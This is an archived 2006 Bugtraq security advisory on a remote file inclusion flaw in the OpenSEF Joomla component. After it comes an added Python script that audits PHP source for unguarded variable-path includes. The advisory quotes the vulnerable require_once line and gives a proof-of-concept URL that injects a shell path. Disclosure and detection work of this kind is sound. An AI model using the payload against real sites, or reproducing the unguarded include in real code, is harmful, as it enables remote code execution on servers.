Bugtraq mailing list archives
Modification For OpenSEF Remote file Inclusion
From: Outlaw () aria-security net
Date: 19 Aug 2006 01:18:24 -0000
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W #
# < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
###########################################################################################
#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)
#Source:
require_once( $mosConfig_absolute_path . '/includes/sef.php' );
} else {
// Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
// ************************************************************************************
#Proof of Concept:
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL
#
#----------------------------------------------------------
#
#
#Contact : Outlaw () aria-security net
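Added example, not part of the advisory or of OpenSEF: a small source audit that flags include/require statements of the kind quoted above, where the path starts with a variable the file never sets itself and no direct-access guard precedes it. The `_VALID_MOS` guard pattern is assumed from Joomla 1.0.x convention, the function name is hypothetical, and the PHP samples are constructed around the advisory's one quoted line.

```python
import re

# include/require whose path expression starts with a PHP variable.
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*(\$[A-Za-z_]\w*)", re.I)
# Assumed guard (Joomla 1.0.x convention, not quoted in the advisory):
#   defined( '_VALID_MOS' ) or die( ... );
GUARD_RE = re.compile(
    r"defined\s*\(\s*['\"]_VALID_MOS['\"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b",
    re.I)
# Plain assignment ($x = ...), excluding ==, === and =>.
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?![=>])")


def find_unguarded_includes(php_source):
    """Return (line, variable) for each include whose path starts with a
    variable that the file neither assigns itself nor protects with the
    direct-access guard, i.e. one the request could supply when PHP's
    register_globals is enabled."""
    findings, guarded, assigned = [], False, set()
    for lineno, line in enumerate(php_source.splitlines(), 1):
        code = line.strip()
        if code.startswith(("//", "#", "/*", "*")):  # skip comment lines
            continue
        if GUARD_RE.search(code):
            guarded = True
        hit = INCLUDE_RE.search(code)
        if hit and not guarded and hit.group(1) not in assigned:
            findings.append((lineno, hit.group(1)))
        assigned.update(ASSIGN_RE.findall(code))
    return findings


# Constructed samples; only the require_once line is taken from the advisory.
VULNERABLE = """<?php
require_once( $mosConfig_absolute_path . '/includes/sef.php' );
"""
GUARDED = """<?php
defined( '_VALID_MOS' ) or die( 'Direct access not allowed' );
require_once( $mosConfig_absolute_path . '/includes/sef.php' );
"""
LOCAL_BASE = """<?php
$base = dirname( __FILE__ );
require_once( $base . '/includes/sef.php' );
"""

if __name__ == "__main__":
    for name in ("VULNERABLE", "GUARDED", "LOCAL_BASE"):
        print(name, find_unguarded_includes(globals()[name]))
```

The check is line-based and does not parse multi-line block comments or follow includes across files, so treat a hit as a prompt for manual review of that entry point.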